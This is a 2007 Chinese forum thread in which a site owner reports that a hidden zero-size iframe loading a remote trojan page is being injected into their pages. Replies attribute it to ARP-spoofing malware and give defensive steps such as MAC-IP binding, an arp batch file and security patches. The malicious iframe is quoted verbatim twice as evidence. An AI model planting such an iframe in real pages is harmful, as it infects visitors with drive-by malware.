加急!!服务器被攻击,网页上会自动加上木马代码:"...yn52.net/admin/kam.htm..."
今日打开我网页,发现有木马,代码:“ <iframe src=http://yn52.net/admin/kam.htm width=20 height=0 frameborder=0> </iframe> ”
可是发现网页没有被修改,应该是我的服务器被攻击了。
可是我找不到这个代码在哪里,搜索了注册表也没有。
第一次碰上这个,请指教!万分感谢!!!
------解决方案--------------------联系我.我给你解决 你中的是arp的病毒
QQ:3711493
MSN:N0dYrOOt@hotmail.com
------解决方案--------------------Xy4Ever(邪恶漫步者) ( ) 信誉:99 Blog 加为好友 2007-6-20 16:02:01 得分: 0
ARP病毒,很明显,我们这前几天也是
Top
XiongFu(雄霸天下) ( ) 信誉:100 Blog 加为好友 2007-6-21 14:22:46 得分: 0
下载antiarp将计算机都装一下防火墙
跟踪分析得到毒源
进行强制杀毒
Top
hoverlees(好棒) ( ) 信誉:100 Blog 加为好友 2007-6-28 21:58:28 得分: 0
服务器中毒啦,熊猫烧香也喜欢在别人的网页里加iframe
Top
------解决方案--------------------是网页木马,不过,它是以ARP攻击传输的~中招之后,会自己连到某木马网站,下载大量木马至你本机;局域网内一台中的话,所有机子都这样;
这些木马用360安全卫士最新版绝大部份可以查杀,都是盗号的(呀呀个呸)~~
1.用nbtscan工具扫描局域网内计算机IP与MAC对应表,找出病源;(假如,你有MAC-IP对应表的话)
2.在路由器上绑定MAC与IP地址,(假如你的路由器支持的话)
3.如路由器不支持,则在客户机上编写批处理,开机自动运行,内容为:
@echo off
arp -d
arp -s 网关 MAC
exit
4.省心的办法,安装AntiARP网络版,不过,客户端要在ADMINI模式下才能运行~~
5.:“ <iframe src=http://yn52.net/admin/kam.htm width=20 height=0 Frameborder=0> </iframe> ”打开的是空白页吧,当然,宽和高都为0,跟我这一模一样。
6.问我为啥这么清楚?因为我这里前段时间刚中过,网络已经恢复好了。。
------解决方案--------------------小妹明确达告诉你,你的服务器没有被攻击,以下来自国家计算机病毒防止中心:
国家计算机病毒应急处理中心通过对互联网的监测发现,近期一些局域网用户遭受了“ARP地址欺骗”病毒新变种的感染,同时也接到了一些用户的上报。
该病毒变种除具备以往ARP病毒发作的特征,诸如:局域网内部分计算机不能正常上网,或是所有计算机均不能上网,还有无法打开Web网页或打开Web网页速度较慢以及局域网连接时断时续并且网速较慢等现象以外,它还会向局域网内发送伪造的ARP欺骗广播,并将受感染的计算机系统伪装成局域网网关,当局域网中的计算机系统发出访问Web网页请求的时候,伪装成网关的计算机系统会把Web网页下载下来并在其中添加一段恶意地址代码一并发送给发出请求的计算机,造成该计算机系统访问Web网站时会主动连接该恶意网址。如果操作系统存在漏洞,就会在访问的计算机系统中植入木马程序,使得计算机系统遭到进一步的破坏,最终导致整个局域网成为“僵尸网络”。
专家提醒:
针对该病毒变种,国家计算机病毒应急处理中心建议广大计算机用户采取如下防范措施:
1、立即升级操作系统中的防病毒软件和防火墙,同时打开“实时监控”功能,实时地拦截来自局域网络上的各种ARP病毒变种。
2、立即下载微软MS06-014和MS07-017两个系统漏洞补丁程序,将补丁程序安装到局
域网络中存在这两个漏洞的计算机系统中,防止病毒变种的感染和传播。